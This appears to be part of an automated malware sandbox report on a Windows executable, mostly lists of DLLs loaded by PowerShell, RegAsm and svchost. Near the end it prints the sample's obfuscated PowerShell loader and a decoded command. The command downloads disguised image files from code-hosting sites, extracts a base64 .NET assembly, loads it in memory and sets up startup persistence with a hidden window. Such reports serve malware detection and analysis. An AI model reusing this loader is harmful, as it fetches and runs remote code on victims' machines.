        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwrite.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: OTO2wVGgkl.exeStatic PE information: Image base 0x140000000 > 0x60000000
        Source: OTO2wVGgkl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
        Source: OTO2wVGgkl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
        Source: OTO2wVGgkl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
        Source: OTO2wVGgkl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: OTO2wVGgkl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
        Source: OTO2wVGgkl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
        Source: OTO2wVGgkl.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
        Source: OTO2wVGgkl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: wextract.pdb source: OTO2wVGgkl.exe
        Source: Binary string: wextract.pdbGCTL source: OTO2wVGgkl.exe
        Source: OTO2wVGgkl.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
        Source: OTO2wVGgkl.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
        Source: OTO2wVGgkl.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
        Source: OTO2wVGgkl.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
        Source: OTO2wVGgkl.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

        Data Obfuscation

        barindex
        Found suspicious powershell code related to unpacking or dynamic code loading
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gc#Z#Bm#GY#ZgBm#GY#ZgBm#GY#LwBk#GQ#Z#Bk#GQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#Gk#bQBn#F8#d#Bl#HM#d##u#Go#c#Bn#D8#MQ#x#Dg#MQ#x#Dc#Mw#1#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#HI#YQB3#C4#ZwBp#HQ#a#B1#GI#dQBz#GU#cgBj#G8#bgB0#GU#bgB0#C4#YwBv#G0#LwBz#GE#bgB0#G8#bQBh#Gw#bw#v#GE#dQBk#Gk#d##v#G0#YQBp#G4#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#N##0#DQ#MQ#3#DI#Mw#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#I##9#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I##k#Gw#aQBu#Gs#cw#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#Gk#Zg#g#Cg#J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##LQBu#GU#I##k#G4#dQBs#Gw#KQ#g#Hs#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#C##J#Bl#G4#Z#BG#Gw#YQBn#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#KQ#7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#ZQBu#GQ#SQBu#GQ#ZQB4#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bl#G4#Z#BG#Gw#YQBn#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#ZwB0#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ck#I#B7#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#C##Kw#9#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##g#D0#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#I##k#HM#d#Bh#HI#d#BJ#
        Suspicious powershell command line found
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gc#Z#Bm#GY#ZgBm#GY#ZgBm#GY#LwBk#GQ#Z#Bk#GQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#Gk#bQBn#F8#d#Bl#HM#d##u#Go#c#Bn#D8#MQ#x#Dg#MQ#x#Dc#Mw#1#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#HI#YQB3#C4#ZwBp#HQ#a#B1#GI#dQBz#GU#cgBj#G8#bgB0#GU#bgB0#C4#YwBv#G0#LwBz#GE#bgB0#G8#bQBh#Gw#bw#v#GE#dQBk#Gk#d##v#G0#YQBp#G4#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#N##0#DQ#MQ#3#DI#Mw#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#I##9#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I##k#Gw#aQBu#Gs#cw#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#Gk#Zg#g#Cg#J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##LQBu#GU#I##k#G4#dQBs#Gw#KQ#g#Hs#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#C##J#Bl#G4#Z#BG#Gw#YQBn#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#KQ#7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#ZQBu#GQ#SQBu#GQ#ZQB4#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bl#G4#Z#BG#Gw#YQBn#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#ZwB0#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ck#I#B7#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#C##Kw#9#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.60op/sdaolnwod/wqtretre/kruremlur/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
